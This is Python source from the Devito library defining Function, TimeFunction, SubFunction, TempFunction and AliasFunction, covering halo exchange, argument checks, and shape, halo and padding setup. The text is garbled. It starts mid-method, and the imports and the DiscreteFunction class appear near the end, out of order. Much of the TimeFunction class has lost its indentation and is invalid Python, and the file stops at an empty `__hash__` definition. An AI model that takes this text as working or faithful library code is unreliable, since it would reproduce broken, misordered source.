        raise RuntimeError("`%s` cannot perform a halo exchange as it has "
                           "no Grid attached" % self.name)

    neighborhood = self._distributor.neighborhood
    comm = self._distributor.comm

    # One exchange per decomposed Dimension and side: send my OWNED region
    # to the neighbor on side `i`, receive into my HALO on the opposite side
    for d in self._dist_dimensions:
        for i in [LEFT, RIGHT]:
            # Get involved peers
            dest = neighborhood[d][i]
            source = neighborhood[d][i.flip()]

            # Gather send data (contiguous buffer required by MPI)
            data = self._data_in_region(OWNED, d, i)
            sendbuf = np.ascontiguousarray(data)

            # Setup recv buffer
            shape = self._data_in_region(HALO, d, i.flip()).shape
            recvbuf = np.ndarray(shape=shape, dtype=self.dtype)

            # Communication
            comm.Sendrecv(sendbuf, dest=dest, recvbuf=recvbuf, source=source)

            # Scatter received data
            # NOTE(review): `recvbuf` is always non-None here; the guard that
            # matters is `source != MPI.PROC_NULL` (no neighbor on that side)
            if recvbuf is not None and source != MPI.PROC_NULL:
                self._data_in_region(HALO, d, i.flip())[:] = recvbuf

    self._is_halo_dirty = False
@property
def _arg_names(self):
    """Tuple of argument names introduced by this function."""
    return (self.name,)

def _arg_defaults(self, alias=None):
    """
    A map of default argument values defined by this symbol.

    Parameters
    ----------
    alias : DiscreteFunction, optional
        To bind the argument values to different names.
    """
    key = alias or self
    args = ReducerMap({key.name: self._data_buffer})

    # Collect default dimension arguments from all indices
    for i, s in zip(key.dimensions, self.shape):
        args.update(i._arg_defaults(_min=0, size=s))

    return args
def _arg_values(self, **kwargs):
    """
    A map of argument values after evaluating user input. If no
    user input is provided, return a default value.

    Parameters
    ----------
    **kwargs
        Dictionary of user-provided argument overrides.
    """
    # Add value override for own data if it is provided, otherwise
    # use defaults
    if self.name in kwargs:
        new = kwargs.pop(self.name)
        if isinstance(new, DiscreteFunction):
            # Set new values and re-derive defaults
            values = new._arg_defaults(alias=self).reduce_all()
        else:
            # We've been provided a pure-data replacement (array)
            values = {self.name: new}
            # Add value overrides for all associated dimensions
            for i, s in zip(self.dimensions, new.shape):
                # Strip halo+padding from the array shape to recover the
                # domain size along `i`
                size = s - sum(self._size_nodomain[i])
                values.update(i._arg_defaults(size=size))
    else:
        values = self._arg_defaults(alias=self).reduce_all()

    return values
def _arg_check(self, args, intervals):
    """
    Check that ``args`` contains legal runtime values bound to ``self``.

    Raises
    ------
    InvalidArgument
        If, given the runtime values ``args``, an out-of-bounds array
        access would be performed, or if shape/dtype don't match with
        self's shape/dtype.
    """
    if self.name not in args:
        raise InvalidArgument("No runtime value for `%s`" % self.name)
    key = args[self.name]
    if len(key.shape) != self.ndim:
        raise InvalidArgument("Shape %s of runtime value `%s` does not match "
                              "dimensions %s" %
                              (key.shape, self.name, self.dimensions))
    # A dtype mismatch is only a warning (data will be reinterpreted/cast),
    # not a hard error
    if key.dtype != self.dtype:
        warning("Data type %s of runtime value `%s` does not match the "
                "Function data type %s" % (key.dtype, self.name, self.dtype))
    # Delegate per-Dimension bounds checking
    for i, s in zip(self.dimensions, key.shape):
        i._arg_check(args, s, intervals[i])
def _arg_finalize(self, args, alias=None):
    # Wrap the raw array into the ctypes dataobj expected by generated code
    key = alias or self
    return {key.name: self._C_make_dataobj(args[key.name])}

# Pickling support
_pickle_kwargs = AbstractFunction._pickle_kwargs +\
    ['grid', 'staggered', 'initializer']
class Function(DiscreteFunction):

    """
    Tensor symbol representing a discrete function in symbolic equations.

    A Function carries multi-dimensional data and provides operations to create
    finite-differences approximations.

    A Function encapsulates space-varying data; for data that also varies in time,
    use TimeFunction instead.

    Parameters
    ----------
    name : str
        Name of the symbol.
    grid : Grid, optional
        Carries shape, dimensions, and dtype of the Function. When grid is not
        provided, shape and dimensions must be given. For MPI execution, a
        Grid is compulsory.
    space_order : int or 3-tuple of ints, optional
        Discretisation order for space derivatives. Defaults to 1. ``space_order`` also
        impacts the number of points available around a generic point of interest. By
        default, ``space_order`` points are available on both sides of a generic point of
        interest, including those nearby the grid boundary. Sometimes, fewer points
        suffice; in other scenarios, more points are necessary. In such cases, instead of
        an integer, one can pass a 3-tuple ``(o, lp, rp)`` indicating the discretization
        order (``o``) as well as the number of points on the left (``lp``) and right
        (``rp``) sides of a generic point of interest.
    shape : tuple of ints, optional
        Shape of the domain region in grid points. Only necessary if ``grid`` isn't given.
    dimensions : tuple of Dimension, optional
        Dimensions associated with the object. Only necessary if ``grid`` isn't given.
    dtype : data-type, optional
        Any object that can be interpreted as a numpy data type. Defaults
        to ``np.float32``.
    staggered : Dimension or tuple of Dimension or Stagger, optional
        Define how the Function is staggered.
    initializer : callable or any object exposing the buffer interface, optional
        Data initializer. If a callable is provided, data is allocated lazily.
    allocator : MemoryAllocator, optional
        Controller for memory allocation. To be used, for example, when one wants
        to take advantage of the memory hierarchy in a NUMA architecture. Refer to
        `default_allocator.__doc__` for more information.
    padding : int or tuple of ints, optional
        .. deprecated:: shouldn't be used; padding is now automatically inserted.

        Allocate extra grid points to maximize data access alignment. When a tuple
        of ints, one int per Dimension should be provided.

    Examples
    --------
    Creation

    >>> from devito import Grid, Function
    >>> grid = Grid(shape=(4, 4))
    >>> f = Function(name='f', grid=grid)
    >>> f
    f(x, y)
    >>> g = Function(name='g', grid=grid, space_order=2)
    >>> g
    g(x, y)

    First-order derivatives through centered finite-difference approximations

    >>> f.dx
    Derivative(f(x, y), x)
    >>> f.dy
    Derivative(f(x, y), y)
    >>> g.dx
    Derivative(g(x, y), x)
    >>> (f + g).dx
    Derivative(f(x, y) + g(x, y), x)

    First-order derivatives through left/right finite-difference approximations

    >>> f.dxl
    Derivative(f(x, y), x)

    Note that the fact that it's a left-derivative isn't captured in the representation.
    However, upon derivative expansion, this becomes clear

    >>> f.dxl.evaluate
    f(x, y)/h_x - f(x - h_x, y)/h_x
    >>> f.dxr
    Derivative(f(x, y), x)

    Second-order derivative through centered finite-difference approximation

    >>> g.dx2
    Derivative(g(x, y), (x, 2))

    Notes
    -----
    The parameters must always be given as keyword arguments, since SymPy
    uses ``*args`` to (re-)create the dimension arguments of the symbolic object.
    """

    is_Function = True

    def _cache_meta(self):
        # Attach additional metadata to self's cache entry
        return {'nbytes': self.size}

    def __init_finalize__(self, *args, **kwargs):
        super(Function, self).__init_finalize__(*args, **kwargs)

        # Space order: either a plain int, or a 3-tuple whose first entry
        # is the order (the left/right point counts are consumed elsewhere,
        # e.g. in `__halo_setup__`)
        space_order = kwargs.get('space_order', 1)
        if isinstance(space_order, int):
            self._space_order = space_order
        elif isinstance(space_order, tuple) and len(space_order) == 3:
            self._space_order, _, _ = space_order
        else:
            raise TypeError("`space_order` must be int or 3-tuple of ints")

        self._fd = self.__fd_setup__()

        # Flag whether it is a parameter or a variable.
        # Used at operator evaluation to evaluate the Function at the
        # variable location (i.e. if the variable is staggered in x the
        # parameter has to be computed at x + hx/2)
        self._is_parameter = kwargs.get('parameter', False)

    def __fd_setup__(self):
        """
        Dynamically add derivative short-cuts.
        """
        return generate_fd_shortcuts(self.dimensions, self.space_order)

    @cached_property
    def _fd_priority(self):
        # Priority used to pick the reference staggering when combining
        # Functions in an expression
        return 1 if self.staggered in [NODE, None] else 2

    @property
    def is_parameter(self):
        return self._is_parameter

    def _eval_at(self, func):
        # Re-index a parameter Function at `func`'s (staggered) grid points;
        # non-parameters, or already matching staggering, are left untouched
        if not self.is_parameter or self.staggered == func.staggered:
            return self
        mapper = {self.indices_ref[d]: func.indices_ref[d]
                  for d in self.dimensions
                  if self.indices_ref[d] is not func.indices_ref[d]}
        if mapper:
            return self.subs(mapper)
        return self

    @classmethod
    def __indices_setup__(cls, **kwargs):
        grid = kwargs.get('grid')
        dimensions = kwargs.get('dimensions')
        if grid is None:
            if dimensions is None:
                raise TypeError("Need either `grid` or `dimensions`")
        elif dimensions is None:
            dimensions = grid.dimensions

        # Staggered indices: shift each staggered Dimension's index by
        # (+/-) half a grid spacing
        staggered = kwargs.get("staggered", None)
        if staggered in [CELL, NODE]:
            staggered_indices = dimensions
        else:
            mapper = {d: d for d in dimensions}
            for s in as_tuple(staggered):
                # `s` may carry a sign, e.g. `-x` -> coefficient c = -1
                c, s = s.as_coeff_Mul()
                mapper.update({s: s + c * s.spacing/2})
            staggered_indices = mapper.values()
        return tuple(dimensions), tuple(staggered_indices)

    @property
    def is_Staggered(self):
        return self.staggered is not None

    @classmethod
    def __shape_setup__(cls, **kwargs):
        grid = kwargs.get('grid')
        dimensions = kwargs.get('dimensions')
        shape = kwargs.get('shape', kwargs.get('shape_global'))
        if grid is None:
            if shape is None:
                raise TypeError("Need either `grid` or `shape`")
        elif shape is None:
            if dimensions is not None and dimensions != grid.dimensions:
                raise TypeError("Need `shape` as not all `dimensions` are in `grid`")
            shape = grid.shape_local
        elif dimensions is None:
            raise TypeError("`dimensions` required if both `grid` and "
                            "`shape` are provided")
        else:
            # Got `grid`, `dimensions`, and `shape`. We sanity-check that the
            # Dimensions in `dimensions` also appearing in `grid` have same size
            # (given by `shape`) as that provided in `grid`
            if len(shape) != len(dimensions):
                raise ValueError("`shape` and `dimensions` must have the "
                                 "same number of entries")
            loc_shape = []
            for d, s in zip(dimensions, shape):
                if d in grid.dimensions:
                    size = grid.dimension_map[d]
                    if size.glb != s and s is not None:
                        raise ValueError("Dimension `%s` is given size `%d`, "
                                         "while `grid` says `%s` has size `%d` "
                                         % (d, s, d, size.glb))
                    else:
                        # Use the *local* size for decomposed Dimensions
                        loc_shape.append(size.loc)
                else:
                    loc_shape.append(s)
            shape = tuple(loc_shape)
        return shape

    def __halo_setup__(self, **kwargs):
        halo = kwargs.get('halo')
        if halo is not None:
            return halo
        else:
            # Derive the halo from the space order: either symmetric
            # (`space_order` points per side) or explicit (o, lp, rp)
            space_order = kwargs.get('space_order', 1)
            if isinstance(space_order, int):
                halo = (space_order, space_order)
            elif isinstance(space_order, tuple) and len(space_order) == 3:
                _, left_points, right_points = space_order
                halo = (left_points, right_points)
            else:
                raise TypeError("`space_order` must be int or 3-tuple of ints")
            # Only space Dimensions get a halo
            return tuple(halo if i.is_Space else (0, 0) for i in self.dimensions)

    def __padding_setup__(self, **kwargs):
        padding = kwargs.get('padding')
        if padding is None:
            if kwargs.get('autopadding', configuration['autopadding']):
                # Auto-padding
                # 0-padding in all Dimensions except in the Fastest Varying Dimension,
                # `fvd`, which is the innermost one
                padding = [(0, 0) for i in self.dimensions[:-1]]
                fvd = self.dimensions[-1]
                # Let UB be a function that rounds up a value `x` to the nearest
                # multiple of the SIMD vector length, `vl`
                vl = configuration['platform'].simd_items_per_reg(self.dtype)
                ub = lambda x: int(ceil(x / vl)) * vl
                # Given the HALO and DOMAIN sizes, the right-PADDING is such that:
                # * the `fvd` size is a multiple of `vl`
                # * it contains *at least* `vl` points
                # This way:
                # * all first grid points along the `fvd` will be cache-aligned
                # * there is enough room to round up the loop trip counts to maximize
                #   the effectiveness SIMD vectorization
                fvd_pad_size = (ub(self._size_nopad[fvd]) - self._size_nopad[fvd]) + vl
                padding.append((0, fvd_pad_size))
                return tuple(padding)
            else:
                return tuple((0, 0) for d in self.dimensions)
        elif isinstance(padding, int):
            # A single int pads the right side of every space Dimension
            return tuple((0, padding) if d.is_Space else (0, 0) for d in self.dimensions)
        elif isinstance(padding, tuple) and len(padding) == self.ndim:
            # A bare int entry means right-padding only
            return tuple((0, i) if isinstance(i, int) else i for i in padding)
        else:
            raise TypeError("`padding` must be int or %d-tuple of ints" % self.ndim)

    @property
    def space_order(self):
        """The space order."""
        return self._space_order

    def sum(self, p=None, dims=None):
        """
        Generate a symbolic expression computing the sum of ``p`` points
        along the spatial dimensions ``dims``.

        Parameters
        ----------
        p : int, optional
            The number of summands. Defaults to the halo size.
        dims : tuple of Dimension, optional
            The Dimensions along which the sum is computed. Defaults to
            ``self``'s spatial dimensions.
        """
        points = []
        for d in (as_tuple(dims) or self.space_dimensions):
            if p is None:
                lp = self._size_inhalo[d].left
                rp = self._size_inhalo[d].right
            else:
                # Split `p` points around `d`: extra point (if `p` odd) on the left
                lp = p // 2 + p % 2
                rp = p // 2
            indices = [d - i for i in range(lp, 0, -1)]
            indices.extend([d + i for i in range(rp)])
            points.extend([self.subs({d: i}) for i in indices])
        return sum(points)

    def avg(self, p=None, dims=None):
        """
        Generate a symbolic expression computing the average of ``p`` points
        along the spatial dimensions ``dims``.

        Parameters
        ----------
        p : int, optional
            The number of summands. Defaults to the halo size.
        dims : tuple of Dimension, optional
            The Dimensions along which the average is computed. Defaults to
            ``self``'s spatial dimensions.
        """
        tot = self.sum(p, dims)
        # NOTE(review): assumes `tot` is a sympy.Add of >= 2 summands; if the
        # sum degenerates to a single term, `tot.args` are that term's own
        # arguments and the divisor would be wrong -- confirm upstream usage
        return tot / len(tot.args)

    # Pickling support
    _pickle_kwargs = DiscreteFunction._pickle_kwargs +\
        ['space_order', 'shape_global', 'dimensions']
class TimeFunction(Function):
"""
Tensor symbol representing a discrete function in symbolic equations.
A TimeFunction carries multi-dimensional data and provides operations to create
finite-differences approximations, in both space and time.
A TimeFunction encapsulates space- and time-varying data.
Parameters
----------
name : str
Name of the symbol.
grid : Grid, optional
Carries shape, dimensions, and dtype of the Function. When grid is not
provided, shape and dimensions must be given. For MPI execution, a
Grid is compulsory.
space_order : int or 3-tuple of ints, optional
Discretisation order for space derivatives. Defaults to 1. ``space_order`` also
impacts the number of points available around a generic point of interest. By
default, ``space_order`` points are available on both sides of a generic point of
interest, including those nearby the grid boundary. Sometimes, fewer points
suffice; in other scenarios, more points are necessary. In such cases, instead of
an integer, one can pass a 3-tuple ``(o, lp, rp)`` indicating the discretization
order (``o``) as well as the number of points on the left (``lp``) and right
(``rp``) sides of a generic point of interest.
time_order : int, optional
Discretization order for time derivatives. Defaults to 1.
shape : tuple of ints, optional
Shape of the domain region in grid points. Only necessary if `grid` isn't given.
dimensions : tuple of Dimension, optional
Dimensions associated with the object. Only necessary if `grid` isn't given.
dtype : data-type, optional
Any object that can be interpreted as a numpy data type. Defaults
to `np.float32`.
save : int or Buffer, optional
By default, ``save=None``, which indicates the use of alternating buffers. This
enables cyclic writes to the TimeFunction. For example, if the TimeFunction
``u(t, x)`` has shape (3, 100), then, in an Operator, ``t`` will assume the
values ``1, 2, 0, 1, 2, 0, 1, ...`` (note that the very first value depends
on the stencil equation in which ``u`` is written.). The default size of the time
buffer when ``save=None`` is ``time_order + 1``. To specify a different size for
the time buffer, one should use the syntax ``save=Buffer(mysize)``.
Alternatively, if all of the intermediate results are required (or, simply, to
avoid using an alternating buffer), an explicit value for ``save`` ( an integer)
must be provided.
time_dim : Dimension, optional
TimeDimension to be used in the TimeFunction. Defaults to ``grid.time_dim``.
staggered : Dimension or tuple of Dimension or Stagger, optional
Define how the Function is staggered.
initializer : callable or any object exposing the buffer interface, optional
Data initializer. If a callable is provided, data is allocated lazily.
allocator : MemoryAllocator, optional
Controller for memory allocation. To be used, for example, when one wants
to take advantage of the memory hierarchy in a NUMA architecture. Refer to
`default_allocator.__doc__` for more information.
padding : int or tuple of ints, optional
.. deprecated:: shouldn't be used; padding is now automatically inserted.
Allocate extra grid points to maximize data access alignment. When a tuple
of ints, one int per Dimension should be provided.
Examples
--------
Creation
>>> from devito import Grid, TimeFunction
>>> grid = Grid(shape=(4, 4))
>>> f = TimeFunction(name='f', grid=grid)
>>> f
f(t, x, y)
>>> g = TimeFunction(name='g', grid=grid, time_order=2)
>>> g
g(t, x, y)
First-order derivatives through centered finite-difference approximations
>>> f.dx
Derivative(f(t, x, y), x)
>>> f.dt
Derivative(f(t, x, y), t)
>>> g.dt
Derivative(g(t, x, y), t)
When using the alternating buffer protocol, the size of the time dimension
is given by ``time_order + 1``
>>> f.shape
(2, 4, 4)
>>> g.shape
(3, 4, 4)
One can drop the alternating buffer protocol specifying a value for ``save``
>>> h = TimeFunction(name='h', grid=grid, save=20)
>>> h
h(time, x, y)
>>> h.shape
(20, 4, 4)
Notes
-----
The parameters must always be given as keyword arguments, since SymPy uses
``*args`` to (re-)create the dimension arguments of the symbolic object.
If the parameter ``grid`` is provided, the values for ``shape``,
``dimensions`` and ``dtype`` will be derived from it. When present, the
parameter ``shape`` should only define the spatial shape of the grid. The
temporal dimension will be inserted automatically as the leading dimension.
"""
is_TimeFunction = True
is_TimeDependent = True
_time_position = 0
"""Position of time index among the function indices."""
def __init_finalize__(self, *args, **kwargs):
    # Time Dimension and time order must be in place *before* the parent
    # setup, which consumes them (e.g. in `__fd_setup__`)
    self.time_dim = kwargs.get('time_dim', self.dimensions[self._time_position])
    self._time_order = kwargs.get('time_order', 1)
    super(TimeFunction, self).__init_finalize__(*args, **kwargs)

    # Check we won't allocate too much memory for the system
    available_mem = virtual_memory().available
    if np.dtype(self.dtype).itemsize * self.size > available_mem:
        warning("Trying to allocate more memory for symbol %s " % self.name +
                "than available on physical device, this will start swapping")
    if not isinstance(self.time_order, int):
        raise TypeError("`time_order` must be int")

    self.save = kwargs.get('save')
def __fd_setup__(self):
"""
Dynamically add derivative short-cuts.
"""
return generate_fd_shortcuts(self.dimensions, self.space_order,
to=self.time_order)
@classmethod
def __indices_setup__(cls, **kwargs):
dimensions = kwargs.get('dimensions')
staggered = kwargs.get('staggered')
if dimensions is None:
save = kwargs.get('save')
grid = kwargs.get('grid')
time_dim = kwargs.get('time_dim')
if time_dim is None:
time_dim = grid.time_dim if isinstance(save, int) else grid.stepping_dim
elif not (isinstance(time_dim, Dimension) and time_dim.is_Time):
raise TypeError("`time_dim` must be a time dimension")
dimensions = list(Function.__indices_setup__(**kwargs)[0])
dimensions.insert(cls._time_position, time_dim)
return Function.__indices_setup__(dimensions=dimensions, staggered=staggered)
@classmethod
def __shape_setup__(cls, **kwargs):
grid = kwargs.get('grid')
save = kwargs.get('save') or None # Force to None if 0/False/None/...
dimensions = kwargs.get('dimensions')
shape = kwargs.get('shape', kwargs.get('shape_global'))
time_order = kwargs.get('time_order', 1)
if grid is None:
if shape is None:
raise TypeError("Need either `grid` or `shape`")
if save is not None:
raise TypeError("Ambiguity detected: provide either `grid` and `save` "
"or just `shape` ")
elif shape is None:
shape = list(grid.shape_local)
if save is None:
shape.insert(cls._time_position, time_order + 1)
elif isinstance(save, Buffer):
shape.insert(cls._time_position, save.val)
elif isinstance(save, int):
shape.insert(cls._time_position, save)
else:
raise TypeError("`save` can be None, int or Buffer, not %s" % type(save))
elif dimensions is None:
raise TypeError("`dimensions` required if both `grid` and "
"`shape` are provided")
else:
shape = super(TimeFunction, cls).__shape_setup__(
grid=grid, shape=shape, dimensions=dimensions
)
return tuple(shape)
@cached_property
def _fd_priority(self):
return 2.1 if self.staggered in [NODE, None] else 2.2
    @property
    def time_order(self):
        """The discretization order in time."""
        return self._time_order
@property
def forward(self):
"""Symbol for the time-forward state of the TimeFunction."""
i = int(self.time_order / 2) if self.time_order >= 2 else 1
_t = self.dimensions[self._time_position]
return self._subs(_t, _t + i * _t.spacing)
@property
def backward(self):
"""Symbol for the time-backward state of the TimeFunction."""
i = int(self.time_order / 2) if self.time_order >= 2 else 1
_t = self.dimensions[self._time_position]
return self._subs(_t, _t - i * _t.spacing)
    @property
    def _time_size(self):
        # Allocated size of the time dimension (leading index)
        return self.shape_allocated[self._time_position]
    @property
    def time_size(self):
        # Public alias for `_time_size`
        return self._time_size
    @property
    def _time_buffering(self):
        # True iff alternating buffers are in use (`save` is not a plain int)
        return not is_integer(self.save)
    @property
    def _time_buffering_default(self):
        # True iff buffering with the default buffer size (no explicit Buffer)
        return self._time_buffering and not isinstance(self.save, Buffer)
    def _arg_check(self, args, intervals):
        """
        Check that the runtime value supplied for `self.name` has a time size
        compatible with this TimeFunction; raise InvalidArgument otherwise.
        """
        super(TimeFunction, self)._arg_check(args, intervals)
        key_time_size = args[self.name].shape[self._time_position]
        if self._time_buffering and self._time_size != key_time_size:
            raise InvalidArgument("Expected `time_size=%d` for runtime "
                                  "value `%s`, found `%d` instead"
                                  % (self._time_size, self.name, key_time_size))
    # Pickling support
    _pickle_kwargs = Function._pickle_kwargs + ['time_order', 'save', 'time_dim']
class SubFunction(Function):
    """
    A Function bound to a "parent" DiscreteFunction.
    A SubFunction hands control of argument binding and halo exchange to its
    parent DiscreteFunction.
    """
    def __init_finalize__(self, *args, **kwargs):
        super(SubFunction, self).__init_finalize__(*args, **kwargs)
        self._parent = kwargs['parent']
    def __padding_setup__(self, **kwargs):
        # SubFunctions aren't expected to be used in time-consuming loops
        return ((0, 0),) * self.ndim
    def _halo_exchange(self):
        # Halo exchange is the parent's responsibility
        return
    def _arg_values(self, **kwargs):
        # Values always derive from the parent's defaults; explicit overrides
        # are rejected
        if self.name not in kwargs:
            return self._parent._arg_defaults(alias=self._parent).reduce_all()
        raise RuntimeError("`%s` is a SubFunction, so it can't be assigned "
                           "a value dynamically" % self.name)
    @property
    def parent(self):
        """The DiscreteFunction this SubFunction is bound to."""
        return self._parent
    _pickle_kwargs = Function._pickle_kwargs + ['parent']
class TempFunction(DiscreteFunction):
    """
    Tensor symbol used to store an intermediate sub-expression extracted from
    one or more symbolic equations.
    Users should not instantiate this class directly. TempFunctions may be created
    by Devito to store intermediate sub-expressions ("temporary values") when the
    user supplies the `cire-ftemps` option to an Operator.
    Unlike other DiscreteFunction types, TempFunctions do not carry data directly.
    However, they can generate Functions to override the TempFunction at Operator
    application time (see the Examples section below).
    TempFunctions are useful if the user wants to retain control over the allocation
    and deletion of temporary storage (by default, instead, Devito uses Arrays, which
    are allocated and deallocated upon entering and exiting C-land, respectively).
    Examples
    --------
    The `make` method makes the TempFunction create a new Function. For more info,
    refer to TempFunction.make.__doc__.
    .. code-block:: python
        op = Operator(...)
        cfuncs = [i for i in op.input if i.is_TempFunction]
        kwargs = {i.name: i.make(grid.shape) for i in cfuncs}
        op.apply(..., **kwargs)
    """
    is_TempFunction = True
    def __init_finalize__(self, *args, **kwargs):
        super().__init_finalize__(*args, **kwargs)
        # Optional Dimension used to iterate over a pool of TempFunctions
        self._pointer_dim = kwargs.get('pointer_dim')
    @classmethod
    def __indices_setup__(cls, **kwargs):
        pointer_dim = kwargs.get('pointer_dim')
        dimensions = as_tuple(kwargs['dimensions'])
        if pointer_dim not in dimensions:
            # This is a bit hacky but it does work around duplicate dimensions when
            # it gets to pickling
            dimensions = as_tuple(pointer_dim) + dimensions
        # Sanity check
        assert not any(d.is_NonlinearDerived for d in dimensions)
        return dimensions, dimensions
    def __halo_setup__(self, **kwargs):
        pointer_dim = kwargs.get('pointer_dim')
        dimensions = as_tuple(kwargs['dimensions'])
        # Test the raw kwarg for None *before* normalizing via `as_tuple`:
        # `as_tuple(None)` returns `()`, which previously made the default
        # branch below unreachable and yielded an empty halo
        halo = kwargs.get('halo')
        if halo is None:
            # Default: no halo along any of the given dimensions
            halo = tuple((0, 0) for _ in dimensions)
        else:
            halo = as_tuple(halo)
        if pointer_dim is not None and pointer_dim not in dimensions:
            # Mirror the pointer Dimension prepended by `__indices_setup__`
            halo = ((0, 0),) + as_tuple(halo)
        return halo
    @property
    def data(self):
        # Any attempt at allocating data by the user should fail miserably
        raise TypeError("TempFunction cannot allocate data")
    data_domain = data
    data_with_halo = data
    data_ro_domain = data
    data_ro_with_halo = data
    @property
    def pointer_dim(self):
        return self._pointer_dim
    @property
    def dim(self):
        # Alias for `pointer_dim`
        return self.pointer_dim
    @property
    def shape(self):
        # Purely symbolic: the sizes are Dimension symbols, not numbers
        domain = [i.symbolic_size for i in self.dimensions]
        return DimensionTuple(*domain, getters=self.dimensions)
    @property
    def shape_with_halo(self):
        # Symbolic domain size plus the (left, right) halo extent per dimension
        domain = self.shape
        halo = [sympy.Add(*i, evaluate=False) for i in self._size_halo]
        ret = tuple(sum(i) for i in zip(domain, halo))
        return DimensionTuple(*ret, getters=self.dimensions)
    shape_allocated = DiscreteFunction.symbolic_shape
    def make(self, shape=None, initializer=None, allocator=None, **kwargs):
        """
        Create a Function which can be used to override this TempFunction
        in a call to `op.apply(...)`.
        Parameters
        ----------
        shape : tuple of ints, optional
            Shape of the domain region in grid points.
        initializer : callable or any object exposing the buffer interface, optional
            Data initializer. If a callable is provided, data is allocated lazily.
        allocator : MemoryAllocator, optional
            Controller for memory allocation. To be used, for example, when one wants
            to take advantage of the memory hierarchy in a NUMA architecture. Refer to
            `default_allocator.__doc__` for more information.
        **kwargs
            Mapper of Operator overrides. Used to automatically derive the shape
            if not explicitly provided.
        """
        if shape is None:
            if len(kwargs) == 0:
                raise ValueError("Either `shape` or `kwargs` (Operator overrides) "
                                 "must be provided.")
            # Resolve each symbolic size against the user-provided overrides
            shape = []
            for n, i in enumerate(self.shape):
                v = i.subs(kwargs)
                if not v.is_Integer:
                    raise ValueError("Couldn't resolve `shape[%d]=%s` with the given "
                                     "kwargs (obtained: `%s`)" % (n, i, v))
                shape.append(int(v))
            shape = tuple(shape)
        elif len(shape) != self.ndim:
            raise ValueError("`shape` must contain %d integers, not %d"
                             % (self.ndim, len(shape)))
        elif not all(is_integer(i) for i in shape):
            raise ValueError("`shape` must contain integers (got `%s`)" % str(shape))
        return Function(name=self.name, dtype=self.dtype, dimensions=self.dimensions,
                        shape=shape, halo=self.halo, initializer=initializer,
                        allocator=allocator)
    def _make_pointer(self, dim):
        # Derive a companion TempFunction iterated via the pointer Dimension `dim`
        return TempFunction(name='p%s' % self.name, dtype=self.dtype, pointer_dim=dim,
                            dimensions=self.dimensions, halo=self.halo)
    def _arg_defaults(self, alias=None):
        raise RuntimeError("TempFunction does not have default arguments ")
    def _arg_values(self, **kwargs):
        if self.name in kwargs:
            new = kwargs.pop(self.name)
            if isinstance(new, DiscreteFunction):
                # Set new values and re-derive defaults
                return new._arg_defaults().reduce_all()
            else:
                raise InvalidArgument("Illegal runtime value for `%s`" % self.name)
        else:
            raise InvalidArgument("TempFunction `%s` lacks override" % self.name)
    # Pickling support
    _pickle_kwargs = DiscreteFunction._pickle_kwargs + ['dimensions', 'pointer_dim']
class AliasFunction(DiscreteFunction):
    """
    Tensor symbol that "aliases" another DiscreteFunction. Aliasing here means that
    the AliasFunction logically represents another object. This is most commonly used
    when we have a generic routine `foo(af, ...)` that we need to apply to multiple
    DiscreteFunctions; here `af` is an AliasFunction, used in the body of `foo`.
    Like a TempFunction, an AliasFunction does not carry data.
    """
    # Index and shape setup are inherited verbatim from Function
    __indices_setup__ = Function.__indices_setup__
    __shape_setup__ = Function.__shape_setup__
    @property
    def _mem_mapped(self):
        # No data is carried, so there is nothing to memory-map
        return False
    @property
    def data(self):
        # Any attempt at allocating data by the user should fail miserably
        raise TypeError("AliasFunction cannot allocate data")
    # All data views collapse onto the (failing) `data` accessor
    data_domain = data
    data_with_halo = data
    data_ro_domain = data
    data_ro_with_halo = data
|
from collections import namedtuple
from ctypes import POINTER, Structure, c_void_p, c_int, cast, byref
from functools import wraps, reduce
from math import ceil
from operator import mul
import numpy as np
import sympy
from psutil import virtual_memory
from cached_property import cached_property
from cgen import Struct, Value
from devito.builtins import assign
from devito.data import (DOMAIN, OWNED, HALO, NOPAD, FULL, LEFT, CENTER, RIGHT,
Data, default_allocator)
from devito.exceptions import InvalidArgument
from devito.logger import debug, warning
from devito.mpi import MPI
from devito.parameters import configuration
from devito.symbolics import FieldFromPointer
from devito.finite_differences import Differentiable, generate_fd_shortcuts
from devito.tools import (ReducerMap, as_tuple, flatten, is_integer,
ctypes_to_cstr, memoized_meth, dtype_to_ctype)
from devito.types.dimension import Dimension
from devito.types.args import ArgProvider
from devito.types.caching import CacheManager
from devito.types.basic import AbstractFunction, Size
from devito.types.utils import Buffer, DimensionTuple, NODE, CELL
__all__ = ['Function', 'TimeFunction', 'SubFunction', 'TempFunction']
# (offset, size) pair describing a data region; returned by `_C_get_field`
RegionMeta = namedtuple('RegionMeta', 'offset size')
class DiscreteFunction(AbstractFunction, ArgProvider, Differentiable):
"""
Tensor symbol representing a discrete function in symbolic equations.
Unlike an Array, a DiscreteFunction carries data.
Notes
-----
Users should not instantiate this class directly. Use Function or
SparseFunction (or their subclasses) instead.
"""
# Required by SymPy, otherwise the presence of __getitem__ will make SymPy
# think that a DiscreteFunction is actually iterable, thus breaking many of
# its key routines (e.g., solve)
_iterable = False
is_Input = True
is_DiscreteFunction = True
_DataType = Data
"""
The type of the underlying data object.
"""
    def __init_finalize__(self, *args, **kwargs):
        # A `Distributor` to handle domain decomposition (only relevant for MPI)
        self._distributor = self.__distributor_setup__(**kwargs)
        # Staggering metadata
        self._staggered = self.__staggered_setup__(**kwargs)
        # Now that *all* __X_setup__ hooks have been called, we can let the
        # superclass constructor do its job
        super(DiscreteFunction, self).__init_finalize__(*args, **kwargs)
        # There may or may not be a `Grid` attached to the DiscreteFunction
        self._grid = kwargs.get('grid')
        # Symbolic (finite difference) coefficients
        self._coefficients = kwargs.get('coefficients', 'standard')
        if self._coefficients not in ('standard', 'symbolic'):
            raise ValueError("coefficients must be `standard` or `symbolic`")
        # Data-related properties and data initialization
        self._data = None
        self._first_touch = kwargs.get('first_touch', configuration['first-touch'])
        self._allocator = kwargs.get('allocator') or default_allocator()
        # The initializer may be lazy (None or a callable) or eager (a buffer)
        initializer = kwargs.get('initializer')
        if initializer is None or callable(initializer):
            # Initialization postponed until the first access to .data
            self._initializer = initializer
        elif isinstance(initializer, (np.ndarray, list, tuple)):
            # Allocate memory and initialize it. Note that we do *not* hold
            # a reference to the user-provided buffer
            self._initializer = None
            if len(initializer) > 0:
                self.data_with_halo[:] = initializer
            else:
                # This is a corner case -- we might get here, for example, when
                # running with MPI and some processes get 0-size arrays after
                # domain decomposition. We touch the data anyway to avoid the
                # case ``self._data is None``
                self.data
        else:
            raise ValueError("`initializer` must be callable or buffer, not %s"
                             % type(initializer))
    def __eq__(self, other):
        # The only possibility for two DiscreteFunctions to be considered equal
        # is that they are indeed the same exact object
        return self is other
    def __hash__(self):
